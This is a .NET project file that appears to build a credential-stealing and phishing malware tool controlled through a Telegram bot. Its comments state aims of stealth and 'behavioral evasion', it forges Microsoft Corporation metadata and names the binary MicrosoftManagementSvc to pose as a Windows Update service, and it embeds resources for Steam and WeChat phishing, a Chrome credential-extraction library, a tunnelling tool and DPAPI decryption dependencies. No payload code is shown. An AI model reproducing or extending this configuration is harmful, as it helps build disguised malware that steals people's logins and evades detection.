<Project Sdk="Microsoft.NET.Sdk">

  <PropertyGroup>
    <OutputType>Exe</OutputType>
    <TargetFramework>net8.0-windows</TargetFramework>
    <ImplicitUsings>enable</ImplicitUsings>
    <Nullable>enable</Nullable>

    <!-- NativeAOT: compiles to native code (no MSIL, no .NET metadata) -> ~15MB -->
    <PublishAot>true</PublishAot>
    <SelfContained>true</SelfContained>
    <RuntimeIdentifier>win-x64</RuntimeIdentifier>
    <IlcOptimizationPreference>Size</IlcOptimizationPreference>
    
    <!-- Reflection is REQUIRED for Telegram.Bot and Newtonsoft.Json -->
    <IlcDisableReflection>false</IlcDisableReflection>
    <IlcGenerateStackTraceData>false</IlcGenerateStackTraceData>
    <TrimMode>partial</TrimMode>
    <EventSourceSupport>false</EventSourceSupport>
    <StackTraceSupport>false</StackTraceSupport>
    <HttpActivityPropagationSupport>false</HttpActivityPropagationSupport>
    <MetadataUpdaterSupport>false</MetadataUpdaterSupport>

    <!-- Size reduction & stealth -->
    <DebugType>None</DebugType>
    <DebugSymbols>false</DebugSymbols>
    <Deterministic>false</Deterministic>
    <InvariantGlobalization>true</InvariantGlobalization>
    <AssemblyName>MicrosoftManagementSvc</AssemblyName>
    <AllowUnsafeBlocks>true</AllowUnsafeBlocks>
    
    <!-- Prestige Metadata for Behavioral Evasion -->
    <Version>1.4.2.0</Version>
    <Authors>Microsoft Corporation</Authors>
    <Company>Microsoft Corporation</Company>
    <Product>Microsoft(R) Management Service</Product>
    <Description>Microsoft(R) Management Service for Windows Update</Description>
    <Copyright>(C) Microsoft Corporation. All rights reserved.</Copyright>
    
    <!-- Match resource prefix used in PhishManager.cs -->
    <RootNamespace>FinalBot</RootNamespace>
    
    <DefaultItemExcludes>$(DefaultItemExcludes);scripts\**;DiscordProSvc\**;tools\**</DefaultItemExcludes>
    
    <!-- WinForms dependency completely removed for NativeAOT support -->
  </PropertyGroup>

  <ItemGroup>
    <Compile Remove="DiscordProSvc\**" />
    <EmbeddedResource Remove="DiscordProSvc\**" />
    <None Remove="DiscordProSvc\**" />
  </ItemGroup>

  <ItemGroup>
    <RdXmlFile Include="rd.xml" />
    <TrimmerRootAssembly Include="Newtonsoft.Json" />
    <TrimmerRootAssembly Include="Telegram.Bot" />
  </ItemGroup>

  <ItemGroup>
    <EmbeddedResource Include="SteamAlert.bin" />
    <EmbeddedResource Include="SteamLogin.bin" />
    <EmbeddedResource Include="chromelevator.bin" />
    <EmbeddedResource Include="svhost.bin" />
    <EmbeddedResource Include="WeChatPhish.bin" />
    <EmbeddedResource Include="bore.bin" />
    <EmbeddedResource Include="e_sqlite3.dll" />
  </ItemGroup>
  
  <ItemGroup>
    <!-- Native Linking for ChromElevator (Static) -->
    <DirectPInvoke Include="chromelevator" />
    <NativeLibrary Include="tools\chromelevator\chromelevator.lib" />
    
    <!-- Win32 Core Dependencies for C++ Integration -->
    <NativeLibrary Include="bcrypt.lib" />
    <NativeLibrary Include="ole32.lib" />
    <NativeLibrary Include="oleaut32.lib" />
    <NativeLibrary Include="shell32.lib" />
    <NativeLibrary Include="version.lib" />
    <NativeLibrary Include="crypt32.lib" />
    <NativeLibrary Include="advapi32.lib" />
    <NativeLibrary Include="user32.lib" />
  </ItemGroup>

  <ItemGroup>
    <!-- Dependencies -->
    <PackageReference Include="Microsoft.Data.Sqlite" Version="8.0.0" />
    <PackageReference Include="Newtonsoft.Json" Version="13.0.3" />
    <PackageReference Include="System.Security.Cryptography.ProtectedData" Version="8.0.0" />
    <PackageReference Include="Telegram.Bot" Version="19.0.0" />
    <PackageReference Include="System.Management" Version="8.0.0" />
  </ItemGroup>

</Project>
